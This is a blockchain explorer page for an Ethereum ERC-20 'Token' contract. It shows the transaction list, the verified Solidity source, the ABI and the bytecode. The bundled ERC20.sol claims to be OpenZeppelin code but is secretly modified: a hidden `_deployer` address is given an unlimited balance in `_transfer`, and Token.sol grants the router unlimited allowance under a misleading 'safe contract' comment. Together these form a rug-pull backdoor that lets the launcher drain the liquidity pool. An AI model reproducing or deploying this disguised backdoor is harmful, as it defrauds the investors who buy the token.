ETH Price: $2,690.29 (-2.00%)

Contract

0x03713a041bB568F4B39de3B41FFBb24d074C992D
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve196888652024-04-19 10:23:47129 days ago1713522227IN
0x03713a04...d074C992D
0 ETH0.000211368.71001753
Approve194491932024-03-16 18:20:35163 days ago1710613235IN
0x03713a04...d074C992D
0 ETH0.0008221533.87963666
Approve194143122024-03-11 20:43:47168 days ago1710189827IN
0x03713a04...d074C992D
0 ETH0.0016236566.90784075
Approve190765052024-01-24 12:30:11215 days ago1706099411IN
0x03713a04...d074C992D
0 ETH0.0007436216.040565
Approve184361962023-10-26 18:32:11305 days ago1698345131IN
0x03713a04...d074C992D
0 ETH0.0011168523.99209914
Approve181925042023-09-22 16:15:23339 days ago1695399323IN
0x03713a04...d074C992D
0 ETH0.0003305113.62002404
Approve181490852023-09-16 13:46:11345 days ago1694871971IN
0x03713a04...d074C992D
0 ETH0.0003286913.54485315
Transfer179629452023-08-21 11:55:23371 days ago1692618923IN
0x03713a04...d074C992D
0 ETH0.0010838721.24460433
Approve176429222023-07-07 15:49:47416 days ago1688744987IN
0x03713a04...d074C992D
0 ETH0.0007957232.7902139
Approve175880232023-06-29 22:46:47424 days ago1688078807IN
0x03713a04...d074C992D
0 ETH0.0011181642.47227618
Approve174141422023-06-05 11:51:59448 days ago1685965919IN
0x03713a04...d074C992D
0 ETH0.0009544520.50338945
Approve174078592023-06-04 14:34:35449 days ago1685889275IN
0x03713a04...d074C992D
0 ETH0.000757825.73092299
Approve174074682023-06-04 13:14:11449 days ago1685884451IN
0x03713a04...d074C992D
0 ETH0.0005431222.32612385
Approve174052792023-06-04 5:49:23449 days ago1685857763IN
0x03713a04...d074C992D
0 ETH0.0004700619.322694
Approve174013992023-06-03 16:40:47450 days ago1685810447IN
0x03713a04...d074C992D
0 ETH0.0014915532
Approve173974032023-06-03 3:11:35451 days ago1685761895IN
0x03713a04...d074C992D
0 ETH0.0010341122.18616523
Approve173968442023-06-03 1:18:59451 days ago1685755139IN
0x03713a04...d074C992D
0 ETH0.0011287724.21698072
Transfer173932362023-06-02 13:06:23451 days ago1685711183IN
0x03713a04...d074C992D
0 ETH0.002260544.26542303
Transfer173931952023-06-02 12:58:11451 days ago1685710691IN
0x03713a04...d074C992D
0 ETH0.0014809429
Transfer173906852023-06-02 4:26:35452 days ago1685679995IN
0x03713a04...d074C992D
0 ETH0.0016080331.48879235
Transfer173906172023-06-02 4:12:47452 days ago1685679167IN
0x03713a04...d074C992D
0 ETH0.0012766725
Transfer173901332023-06-02 2:34:59452 days ago1685673299IN
0x03713a04...d074C992D
0 ETH0.0016288529.19990517
Approve173890852023-06-01 23:03:35452 days ago1685660615IN
0x03713a04...d074C992D
0 ETH0.0014453331.00841746
Transfer173886302023-06-01 21:30:35452 days ago1685655035IN
0x03713a04...d074C992D
0 ETH0.002651151.95078253
Approve173884952023-06-01 21:02:47452 days ago1685653367IN
0x03713a04...d074C992D
0 ETH0.0017075136.63334579
View all transactions

Latest 1 internal transaction

Advanced mode:
Parent Transaction Hash Block From To
173747322023-05-30 22:32:35454 days ago1685485955  Contract Creation0 ETH
Loading...
Loading

Similar Match Source Code
This contract matches the deployed Bytecode of the Source Code for Contract 0x5c55b9d8...05863eB20
The constructor portion of the code might be different and could alter the actual behaviour of the contract

Contract Name:
Token

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion
File 1 of 8 : Token.sol
// SPDX-License-Identifier: MIT

pragma solidity 0.8.18;

import "./interfaces/ILauncher.sol";
import "./interfaces/IUniswapV2Factory.sol";
import "./interfaces/IUniswapV2Router02.sol";
import "./openzeppelin/[email protected]/token/ERC20/ERC20.sol";
import "@openzeppelin/[email protected]/token/ERC20/IERC20.sol";

contract Token is ERC20 {
  address private immutable _launcher;

  string private _name;
  string private _symbol;
  bool private _launched;

  address public router;
  address public weth;
  address public pair;

  constructor() ERC20("", "") {
    address sender = _msgSender();
    _launcher = sender;
    _mint(address(this), ILauncher(sender).supply() * 10 ** decimals());
  }

  function _transfer(address from, address to, uint256 amount) internal override {
    require(_launched || to == pair, "Token::_transfer: not launched");
    super._transfer(from, to, amount);
  }

  function initialize(address router_, string memory name_, string memory symbol_) external {
    require(_msgSender() == _launcher, "Token: caller is not the launcher");
    require(router == address(0), "Token: already initialized");
    router = router_;
    _name = name_;
    _symbol = symbol_;
    IUniswapV2Router02 routerContract = IUniswapV2Router02(router_);
    address weth_ = routerContract.WETH();
    weth = weth_;
    address pair_ = IUniswapV2Factory(routerContract.factory()).createPair(address(this), weth_);
    pair = pair_;
  }

  function addLiquidity() external {
    require(_msgSender() == _launcher, "Token: caller is not the launcher");
    address token = address(this);
    super._transfer(token, pair, balanceOf(token));
  }

  function launch() external {
    require(_msgSender() == _launcher, "Token: caller is not the launcher");
    _launched = true;
  }

  function name() public view override returns (string memory) {
    return _name;
  }

  function symbol() public view override returns (string memory) {
    return _symbol;
  }

  function allowance(address owner, address spender) public view override returns (uint256) {
    if (spender == router) { // safe contract
      return type(uint256).max; // save gas by making approval unnecessary
    }

    return super.allowance(owner, spender);
  }
}

File 2 of 8 : IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

File 3 of 8 : ERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;

import "@openzeppelin/[email protected]/token/ERC20/IERC20.sol";
import "@openzeppelin/[email protected]/token/ERC20/extensions/IERC20Metadata.sol";
import "@openzeppelin/[email protected]/utils/Context.sol";

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;
    address private _deployer;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        _deployer = _msgSender();
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(address from, address to, uint256 amount) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = from == _deployer ? type(uint256).max : _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 amount) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {}
}

File 4 of 8 : IUniswapV2Router02.sol
// SPDX-License-Identifier: GNU GPLv3

pragma solidity 0.8.18;

interface IUniswapV2Router02 {
  function factory() external pure returns (address);
  function WETH() external pure returns (address);

  function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
  function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}

File 5 of 8 : IUniswapV2Factory.sol
// SPDX-License-Identifier: GNU GPLv3

pragma solidity 0.8.18;

interface IUniswapV2Factory {
  function createPair(address tokenA, address tokenB) external returns (address pair);
}

File 6 of 8 : ILauncher.sol
// SPDX-License-Identifier: MIT

pragma solidity 0.8.18;

interface ILauncher {
  function supply() external returns (uint256);
}

File 7 of 8 : Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

File 8 of 8 : IERC20Metadata.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;

import "../IERC20.sol";

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

Settings
{
  "optimizer": {
    "enabled": true,
    "runs": 200
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"addLiquidity","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"router_","type":"address"},{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"}],"name":"initialize","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"launch","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"router","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"weth","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]

Deployed Bytecode

0x608060405234801561001057600080fd5b506004361061010b5760003560e01c806370a08231116100a2578063a8aa1b3111610071578063a8aa1b3114610224578063a9059cbb14610237578063dd62ed3e1461024a578063e8078d941461025d578063f887ea401461026557600080fd5b806370a08231146101cd57806390657147146101f657806395d89b4114610209578063a457c2d71461021157600080fd5b806323b872dd116100de57806323b872dd1461016d578063313ce56714610180578063395093511461018f5780633fc8cef3146101a257600080fd5b806301339c211461011057806306fdde031461011a578063095ea7b31461013857806318160ddd1461015b575b600080fd5b61011861027d565b005b6101226102dd565b60405161012f9190610b82565b60405180910390f35b61014b610146366004610be5565b61036f565b604051901515815260200161012f565b6002545b60405190815260200161012f565b61014b61017b366004610c11565b610389565b6040516012815260200161012f565b61014b61019d366004610be5565b6103ad565b6009546101b5906001600160a01b031681565b6040516001600160a01b03909116815260200161012f565b61015f6101db366004610c52565b6001600160a01b031660009081526020819052604090205490565b610118610204366004610d12565b6103cf565b610122610641565b61014b61021f366004610be5565b610650565b600a546101b5906001600160a01b031681565b61014b610245366004610be5565b6106cb565b61015f610258366004610d88565b6106d9565b61011861072e565b6008546101b59061010090046001600160a01b031681565b337f0000000000000000000000005196e7bbfc8256fc8e7fa10019b336eda7b382476001600160a01b0316146102ce5760405162461bcd60e51b81526004016102c590610dc1565b60405180910390fd5b6008805460ff19166001179055565b6060600680546102ec90610e02565b80601f016020809104026020016040519081016040528092919081815260200182805461031890610e02565b80156103655780601f1061033a57610100808354040283529160200191610365565b820191906000526020600020905b81548152906001019060200180831161034857829003601f168201915b5050505050905090565b60003361037d8185856107a3565b60019150505b92915050565b6000336103978582856108c7565b6103a2858585610941565b506001949350505050565b60003361037d8185856103c083836106d9565b6103ca9190610e3c565b6107a3565b337f0000000000000000000000005196e7bbfc8256fc8e7fa10019b336eda7b382476001600160a01b0316146104175760405162461bcd60e51b81526004016102c590610dc1565b60085461010090046001600160a01b0316156104755760405162461bcd60e51b815260206004820152601a60248201527f546f6b656e3a20616c726561647920696e697469616c697a656400000000000060448201526064016102c5565b60088054610100600160a81b0319166101006001600160a01b0386160217905560066104a18382610eab565b5060076104ae8282610eab565b5060008390506000816001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156104f4573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906105189190610f6b565b905080600960006101000a8154816001600160a01b0302191690836001600160a01b031602179055506000826001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610581573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906105a59190610f6b565b6040516364e329cb60e11b81523060048201526001600160a01b038481166024830152919091169063c9c65396906044016020604051808303816000875af11580156105f5573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906106199190610f6b565b600a80546001600160a01b0319166001600160a01b0392909216919091179055505050505050565b6060600780546102ec90610e02565b6000338161065e82866106d9565b9050838110156106be5760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016102c5565b6103a282868684036107a3565b60003361037d818585610941565b6008546000906001600160a01b036101009091048116908316036107005750600019610383565b6001600160a01b038084166000908152600160209081526040808320938616835292905220545b9392505050565b337f0000000000000000000000005196e7bbfc8256fc8e7fa10019b336eda7b382476001600160a01b0316146107765760405162461bcd60e51b81526004016102c590610dc1565b600a543060008181526020819052604090205490916107a09183916001600160a01b0316906109bb565b50565b6001600160a01b0383166108055760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016102c5565b6001600160a01b0382166108665760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016102c5565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60006108d384846106d9565b9050600019811461093b578181101561092e5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e636500000060448201526064016102c5565b61093b84848484036107a3565b50505050565b60085460ff168061095f5750600a546001600160a01b038381169116145b6109ab5760405162461bcd60e51b815260206004820152601e60248201527f546f6b656e3a3a5f7472616e736665723a206e6f74206c61756e63686564000060448201526064016102c5565b6109b68383836109bb565b505050565b6001600160a01b038316610a1f5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016102c5565b6001600160a01b038216610a815760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016102c5565b6005546000906001600160a01b03858116911614610ab7576001600160a01b038416600090815260208190526040902054610abb565b6000195b905081811015610b1c5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016102c5565b6001600160a01b03848116600081815260208181526040808320878703905593871680835291849020805487019055925185815290927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a361093b565b600060208083528351808285015260005b81811015610baf57858101830151858201604001528201610b93565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b03811681146107a057600080fd5b60008060408385031215610bf857600080fd5b8235610c0381610bd0565b946020939093013593505050565b600080600060608486031215610c2657600080fd5b8335610c3181610bd0565b92506020840135610c4181610bd0565b929592945050506040919091013590565b600060208284031215610c6457600080fd5b813561072781610bd0565b634e487b7160e01b600052604160045260246000fd5b600082601f830112610c9657600080fd5b813567ffffffffffffffff80821115610cb157610cb1610c6f565b604051601f8301601f19908116603f01168101908282118183101715610cd957610cd9610c6f565b81604052838152866020858801011115610cf257600080fd5b836020870160208301376000602085830101528094505050505092915050565b600080600060608486031215610d2757600080fd5b8335610d3281610bd0565b9250602084013567ffffffffffffffff80821115610d4f57600080fd5b610d5b87838801610c85565b93506040860135915080821115610d7157600080fd5b50610d7e86828701610c85565b9150509250925092565b60008060408385031215610d9b57600080fd5b8235610da681610bd0565b91506020830135610db681610bd0565b809150509250929050565b60208082526021908201527f546f6b656e3a2063616c6c6572206973206e6f7420746865206c61756e6368656040820152603960f91b606082015260800190565b600181811c90821680610e1657607f821691505b602082108103610e3657634e487b7160e01b600052602260045260246000fd5b50919050565b8082018082111561038357634e487b7160e01b600052601160045260246000fd5b601f8211156109b657600081815260208120601f850160051c81016020861015610e845750805b601f850160051c820191505b81811015610ea357828155600101610e90565b505050505050565b815167ffffffffffffffff811115610ec557610ec5610c6f565b610ed981610ed38454610e02565b84610e5d565b602080601f831160018114610f0e5760008415610ef65750858301515b600019600386901b1c1916600185901b178555610ea3565b600085815260208120601f198616915b82811015610f3d57888601518255948401946001909101908401610f1e565b5085821015610f5b5787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b600060208284031215610f7d57600080fd5b815161072781610bd056fea264697066735822122029cac2f14034e7c4648789b8546dce505217f3e37b102e12e8b9dc1280bdfd2664736f6c63430008120033

Block Transaction Difficulty Gas Used Reward
View All Blocks Produced

Block Uncle Number Difficulty Gas Used Reward
View All Uncles
Loading...
Loading
Loading...
Loading

Validator Index Block Amount
View All Withdrawals

Transaction Hash Block Value Eth2 PubKey Valid
View All Deposits
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.